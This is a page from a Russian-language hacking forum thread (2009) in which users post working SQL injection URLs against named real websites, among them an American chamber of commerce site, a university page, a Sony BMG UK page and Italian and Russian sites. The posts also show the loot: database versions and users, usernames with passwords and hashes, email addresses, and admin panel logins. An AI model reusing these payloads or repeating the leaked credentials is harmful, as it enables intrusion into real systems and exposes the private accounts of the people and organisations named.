ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9381  
Старый 16.05.2009, 17:19
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://chocoisland.ru/chocolate.php?id=11+and+null+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())
z92680_site@77.221.130.21:z92680_site:5.0.32-Debian_7etch6-log
 
Ответить с цитированием

  #9382  
Старый 16.05.2009, 19:49
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

onixvisn10.com

Код:
http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11
Версия - 5 5.0.67-community-log
Юзер - onixvisn_stfr1@localhost
БД - onixvisn_stfr1

Юзеры:

Код:
http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,User_nickname,user_passwd,user_email),7,8,9,10,11+from+users
Код:
Chuck Prickett:dcf24fe936aaf7ed828da2cef9901a60:visn10@idleworth.com
Админка:

Код:
Для начала нужно залогинится здесь - http://onixvisn10.com/login.php
А потом заходить сюда -  http://onixvisn10.com/admin/
Код:
Email Address - visn10@idleworth.com
Password - 2resume
 
Ответить с цитированием

  #9383  
Старый 16.05.2009, 23:34
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.usmcoc.org {PR 6}
Код:
http://www.usmcoc.org/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
5.0.67-community : vicom_usmcoc : vicom_usmcoc@localhost

tables:
Код:
http://www.usmcoc.org/event.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables--
------------------------------------------------------------------------------------------------

http://www.fraudadvisorypanel.org {PR 5}
Код:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--
4.1.22 : fap_events: fap_events@83.223.106.10

table users:
Код:
http://www.fraudadvisorypanel.org/newsite/events.php?id=3+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+users--
username : password
fap:apw4fap
testuser:testpword
Tamaryn:michael
MiaCampbell:Molly74

http://www.fraudadvisorypanel.org/newmembers/login.php

------------------------------------------------------------------------------------------------

http://www.monroenc.org {PR 5}
Код:
http://www.monroenc.org/events.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9--
version() - 5.0.67
database - monroenc
user - monroenc@localhost

Последний раз редактировалось Skofield; 17.05.2009 в 00:40..
 
Ответить с цитированием

  #9384  
Старый 16.05.2009, 23:36
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR6
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,concat_ws(0x3a,user,password)+from+mysql.user/*
Database Version: 4.1.21-standard
Database name: gaston_db
User name: tltltl@info.umb.edu

root:00c8bef335a35d31
 
Ответить с цитированием

  #9385  
Старый 17.05.2009, 01:54
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию

www.sonybmgmusic.co.uk
Просто красивая(как мне кажется) иньекция..
Пользователи, их пароли:
Цитата:
http://www.sonybmgmusic.co.uk/artists/annie_lennox'%20and%200%20union%20select%201,2,3,4 ,5,group_concat(concat_ws(0x3a,iu_id,iu_email,iu_p assword,iu_first_name)%20separator%20'%3Cbr%3E'),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20int ranet_users--%20
P.S. Это не боян,
гуглим site:forum.antichat.ru sonybmgmusic.co.uk/
результат выдал адрес
https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
где находится сообщение пользователя Buddah:
"нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет"
sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - а это почти ничего, тут даже инъекции нет, потаму что кроме других неверных моментов (которые имеют место быть), в первую очередь тут знак + не проходит за пробел, а проходит как просто символ '+', уже поэтому никакого order by в таком виде не будет. Написал это, потаму что кто-то обвинил в том, что я кинул боян.

Последний раз редактировалось Maestus; 17.05.2009 в 02:50..
 
Ответить с цитированием

  #9386  
Старый 17.05.2009, 03:15
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

{PR6}
http://www.effwa.org/main/page.php?number=72+UNI ON+SELECT+0,1,2,3,4,5,concat(table_name,0x0b,colum n_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x 73716C696E6A666C643137,0x73716C696E6A666C643137,0x 73716C696E6A666C643137+FROM+INFORMATION_SCHEMA.COL UMN S--


effwadbu@web-ppb.srv.lexi.net
5.0.67-log
effwa

{PR4}
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x 0b,vers ion(),user(),database()),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

5.0.67
holmesmillet@web01.vidar.com
vidarMain

Все таблицы
http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27+from+information_sch ema.columns

{PR6}
http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,conc at_ws(0x0b,user(),version(),dat abase()),4,5,6,7,8,9,10+--+

thecock@localhost
4.0.20-standard
tc21


http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,con cat_ws(0x0b,email,pas s),4,5,6,7,8,9,10+FROM+tc21.users+LIMIT+8500,1+--+

Юзеры 8500 человек

Последний раз редактировалось udman; 17.05.2009 в 13:47..
 
Ответить с цитированием

  #9387  
Старый 17.05.2009, 09:36
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 2

http://www.parcobelvedere.it/hotel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os)--&l=e

5.0.51a-5-log:PARCOBELVEDERE:PARCOBELVEDERE@r5d6.wp.wifisolu tion.it:debian-linux-gnu
 
Ответить с цитированием

  #9388  
Старый 17.05.2009, 11:47
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.chehaliscoral.com

Код:
http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,version(),user(),database()),2/*
Версия - 5.0.33:
Юзер - chehaliscoral@localhost
БД - chehaliscoral

Юзеры:

Код:
http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,id,password,email),2+from+users+limit+0,1/*
Код:
5:234:ryan
Админка:
Код:
http://www.chehaliscoral.com/admin
Код:
Username - ryan
Password - 234
 
Ответить с цитированием

  #9389  
Старый 17.05.2009, 12:09
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

_http://www.floramed.ru/detailnews.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),user (),database())

4.0.27-log:flora@zvm14.host.ru:flora

_http://www.adameva.ru/index.php?link_n=6&id_theme=30012&page=1&id_sectio n=923+union+select+concat_ws(0x3a,EMAIL_USER,PASSW ORD)+from+users+limit+1,1--&forum_desc=

KBALENKO@MAIL.RU:PUSHKA

Последний раз редактировалось jokester; 17.05.2009 в 12:35.. Причина: Объединяй посты
 
Ответить с цитированием

  #9390  
Старый 17.05.2009, 12:37
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 4

http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,version(),3,4,5,6,7--

юзеры : http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,usern ame,password)),3,4,5,6,7+from+gestione_utente--


lupo:123lupetti,depensato:1234,Cirrolo:1234,tienid uro:1234,amod:1234,VENCESLAO:1234,angelo:1234,,,:, :,raro:rarissimo,cesare:1234,lunatika42:1234,annic a:1234,1pixel:1234,effeblu:1234,,robotpbimpis,an tonellonairam,gccasarano:230805,alberto.facchini :gianna,ludav:airone44,cleo:cleo98,,GINEVRA:achill e,cappelli:cappelli,claudio boccardi:athenaze,gigiobill:annafalchi,sissi:geron imo,kekko:kekko,alemonti:24682468,ndindi93:asdola, sassicaia:sassicaia,ciscotn:nike2004,robinhood:rob inhood,nonhodormitomai:massimo,william85:210185,fa tandsowhat:lucacamilo,madrisio:madrisio,,vibodha:a pritisedano,isabella:budapest,rarissimo:rarissimo, Paracelso:Mariomario,lordgc:apocalisse,barbiedoll: barbie,luiggioneaperino,alessandraterni:solita cosa,flygirl75:morrison,patrizia.kopsch,vitogreco: angolo,fulminata:farfalla,traparentesiarole,ales sandraterni:solita cosa,gigiobill:annafalchi,antonio:123lupetti,gigio bill:annafalchi,Adilon89:1989A,roby72:robylupo,Mar got:230987,,sorgoles:catania,g.facciotti:degregori 51,elio1954@alice.itaolawi


##############################################

http://estetika-it.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.1.25:estetika_user@localhost:estetika_it

Последний раз редактировалось HAXTA4OK; 17.05.2009 в 12:46..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT.XYZ